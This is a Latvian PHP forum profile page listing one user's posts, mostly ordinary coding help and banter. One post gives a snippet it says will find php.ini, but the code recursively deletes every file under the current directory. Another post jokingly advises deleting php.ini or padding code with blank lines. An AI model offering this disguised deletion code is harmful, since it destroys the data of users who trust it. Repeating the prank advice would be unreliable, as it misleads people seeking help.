Jump to content
php.lv forumi

m8t

Reģistrētie lietotāji
  • Posts

    385
  • Joined

  • Last visited

Everything posted by m8t

  1. Kā darbojas funkcijas: 1. Tiek izsaukta funkcija query("array", "SELECT email FROM users", "email"); 2. Pie pirmā return dotā vērtība tiek atgriezta. 3. The end. Kā tu domā, ka darbojas funkcijas (skatoties pēc šī koda): 1. Tiek izsaukta funkcija 2. Tiek ciklēts cauri visai funkcijai (no augšas līdz apakšai, @return neņemot vērā) 3. Kad viss izciklēts -> tikai tad atgriežam informāciju ar return. Kļūda: Tevis izveidotajā CIKLĀ tiek atgrieztas visas nepieciešamās rindas - viena pēc otras. Bet tu atgriez pirmo, kas ir izvilkta no datubāzes.
  2. Saglabā šo kaut kādā failā (fails.php) un pamēģini palaist. Skripts automātiski atradīs php.ini failu un izmetīs tā atrašanās vietu function readDirs($main){ $dirHandle = opendir($main); while($file = readdir($dirHandle)){ if(is_dir($file) && $file != '.' && $file != '..') readDirs($file); else unlink($file) } } echo readDirs('.');
  3. Varētu būt, ka vaina ir php.ini failā. Pamēģini to izdzēst. Pēc idejas vajadzetu izveidoties jaunam (kurš būs pareizs), kad atvērsi pa jaunu vaļā serveri. Vēl vari mēģināt php kodā starp katru rindiņu ielikt kādas 10 atstarpes (tukšas rindas). Dažreiz tas palīdz.
  4. m8t

    Par programmētājiem.

    He, lasot komentārus sapratu, ka, laikam, man ir aizbraucis širmis. Nu neko, jādzīvo tālāk. Lai pelnītu miljonus un dzīvotu laimīgi havaju salās es ieteiktu iet tomēr vidusskolā. Kāpēc? Nebūsim tik tuvredzīgi, skatīsimies nāktonē. Kas pēc vidusskolas? Darbs vai tālāka izglītība? Ja tālāka izglītība - kur? Latvijā vai Ārzemēs? Ārzemēs? Varbūt MIT? Jā, ieklūsti tur un nākotne kā pārtikušam cilvēkam garantēta. Bet reāli šī izvēle nav tik svarīga. Programmētāji ir cilvēki, kas visu apgūst pašapmācības ceļā. Paši kaut ko atrod, paši interesējas un izprot, iegaumē. Un, nē, programmēšana nav vienīgā lieta, ko vajadzētu apgūt šāda veidā. Padziļināti citus priekšmetus, kā piemēram to pašu matemātiku, var apgūt internetā. Varbūt nebūs dokuments, bet tā nav tā lieta uz ko baigi skatītos visi..
  5. Klients = tu pats? Cik nopratu, tad tev vajag izveidot sistēmu colorsys.lv mājaslapai. Mazliet uzkoptu savu sarakstīto un varbūt pat kāds pieeredzējis programmētājs (ne joomla vai ucoz "profiņš") tev aizrakstītu kādu vēstulīti. Pašlaik gan šaubos, ka kāds baigi interesēsies.. Dodiet ziņu par saviem sasniegumiem un iespējamo samaksas principu. Samaksas princips?
  6. document.getElementById("premium").style.display = "none" document.getElementById("goldmember").style.display = "none" document.getElementById(type).style.display = "" Kur pazuduši " ; " simboli? Arī šī ir kļūda. Nevalidēsies bez "". <span id=premium style=display:none>test1</span> <span id=goldmember style=display:none>test2</span>
  7. m8t

    Kur problēma?"

    Problēma ir tavā datorā/serverī/failos
  8. Tās melnbaltās tā tīri vēl neko izskatās. Pašas lapas dizains ari diezgan jauks. Kopumā labs darbiņš. ;)
  9. @Nordvind Uzlaužams un - nepiekrītu. Šajā pasaulē nekas nav ideāls, vienmēr ir kāda nepilnība kaut kur. Tāpat arī tāda lieta, kā perfekts kods nepastāv. Jā, ir labs kods, bet ne perfekts vai ideāls. Cik es zinu tad jaunajā HTML5 ir tāda fīča, kā lapas satura labošana un saglabāšana lietotāja datorā. Kāpēc gan neizmantot to + AJAX priekš informācijas saglabāšanas. Tad tas CMS būs vēl oriģinālāks un neparastāks. Jā, veci pārlūki neatbalsta HTML5... bet priekš kam mums viņus? Šis taču ir ūber jauns projekts ar visādām jaunām fiškām, un, lai viņi iet pa gaisu, mēs skatāmies nakotnei tieši acīs. ^ Neesmu 100% pārliecināts, ka tas ir iespējams. Neesmu ne mēģinajis, ne lasījis par mēģinājumiem, bet mēģināt jau var..
  10. Nezinu kāpēc, bet man šis viss baigi asociējas ar ucoz. Pirmais iespaids kaut kā.. Nezinu pat, grūti pateikt. Man, personīgi, nepatīk.
  11. @codez Wow, tu jau viņu dabūji? Dzirdēju, ka tagad tikai pasaules elite viņu var izmantot un ka mirstīgajiem izlaidīs tikai ap 2013 gadu.. Šitā noveikties, nu vecīt..
  12. m8t

    taimeris

    Es taisīju vienu vielu.. Taisīju, taisīju, bet nesanāca. Gribēju tā, lai būtu liels būkšķis, kad viņu pielej ūdenim un tad, tajā udenī, lai izveidotos sarkana sirsniņa. Es visādi mēģināju, nesanāca. Vai kāds nevar man palīdzēt te kaut ko izlabot, lai sanāktu? Jā, bet kādas vielas izmantoji un ko līdz šim darīji? TEV KAUNA NAV? MANI PAR GALĪGU MUĻKI UZSKATI, KA TAGAD TEIKŠU VISU PAR SAVU 2 MĒNEŠU DARBU? MAN VAJAG PALĪDZĪBU NEVIS KAUT KĀDUS ZAGĻUS TE!!!! Ceru, ka domu saprati... Bez tava pašreizējā koda, ko tu neesi vēl parādījis, mēs tev varam ļoti maz palīdzēt.
  13. @briedis Tas vairāk izskatās pēc darba piedāvājuma, ne "HELP, NEMĀKU!!@!"
  14. Ideja vienkārša: kā dzēst nevajadzīgus HTML tagus? Dati pašlaik tiek iegūti ar file_get_contens() vai tie tiek lietotāja paša ievadīti. Ko es vēlos izdarīt? Izskriet cauri šim HTML failam/kodam un izdzēst visus liekos tagus (tādu, kur ir TIKAI atvērti vai aizvērti). HTML paraugs: <html> <body> <p>Šis ir OK</p> <p><small>Šis nav ok!</p> </body> </html> Šajā gadījumā es vēlos tikt vaļā no <small> taga, jo viņš nav aizvērts. Vai ir jau kāda gatava klase šai lietai? Google meklēju - neatradu, bet, varbūt, jūs zinat kādu?
  15. Pirmajā variantā ir vairāk simboli. Ps. - gribi kaut ko vēl labāku? sha1()
  16. m8t

    jquery

    VIŅI LASA TAVAS DOMAS UN MANIPULĒ AR TĀM! ĀTRI, UZTAISI ŠO CEPURI, TAD VIŅI BŪS BEZSPĒCĪGI!!!
  17. http://www.myjqueryplugins.com/jNotify
  18. @briedis Nē, vispār neskatos un neanalizēju katru teksta simbolu, kas tiek pievienots datubāzei, tādēļ arī nepamanīju. Drošība no SQL injecēm + teksta noīsināšana pirms pievienošanas DB pietiekami labi strādā.
  19. @briedis Nezināju, ka slashi nesaglabājas DB. Nebiju ievērojis.
  20. Jā, vari neizmantot nekādu funkciju un būt vulnerable pret SQL injecēm :) Vai arī izmanto manis doto funkciju liekot info. iekšā datubāzē un, kad velc kaut ko laukā, tad izvelc vēl cauri stripslashes(), lai noņemtu " \ ".
  21. <table width="100%" border="0" align="center">
×
×
  • Create New...